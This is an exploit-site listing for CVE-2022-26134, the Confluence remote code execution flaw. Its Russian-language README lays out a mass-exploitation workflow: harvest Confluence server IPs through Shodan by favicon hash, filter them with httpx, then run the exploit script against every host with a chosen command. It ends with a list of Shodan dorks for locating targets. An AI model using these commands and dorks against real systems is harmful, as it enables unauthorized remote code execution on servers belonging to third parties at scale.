Sploitus

Exploit for CVE-2022-26134

kitploit · 2026-08-27

Exploit Code

MARKDOWN33 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ABHISHEKMORLA-CVE-2022-26134
# CVE-2022-26134

  1. Сначала запустите скрипты shodan, чтобы получить все IP-адреса   
  
`python3 shodan_script.py -API your_api -L limit -D "http.favicon.hash:-305179312 200" > log.txt`   
  
`ex: python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt`

  2. Для всех валидных IP-адресов:   
  
`cat log.txt | httpx -o forexploits.txt`

  3. Запустите эксплойт против списка "forexploits.txt":   
  
`python3 CVE-2022-26134.py forexploits.txt "whoami"`   
  
что выводит IP-адрес и команду для уязвимых хостов.




# Shodan_Dorks для CVE-2022-26134

`http.component:"atlassian confluence"`  
  
`http.favicon.hash:-305179312"`  
  
`http.title:"Log In - Confluence" 200`  
  
`http.component:"atlassian confluence" http.title:"Log In - Confluence" 200`  
  
`http.favicon.hash:-305179312 200`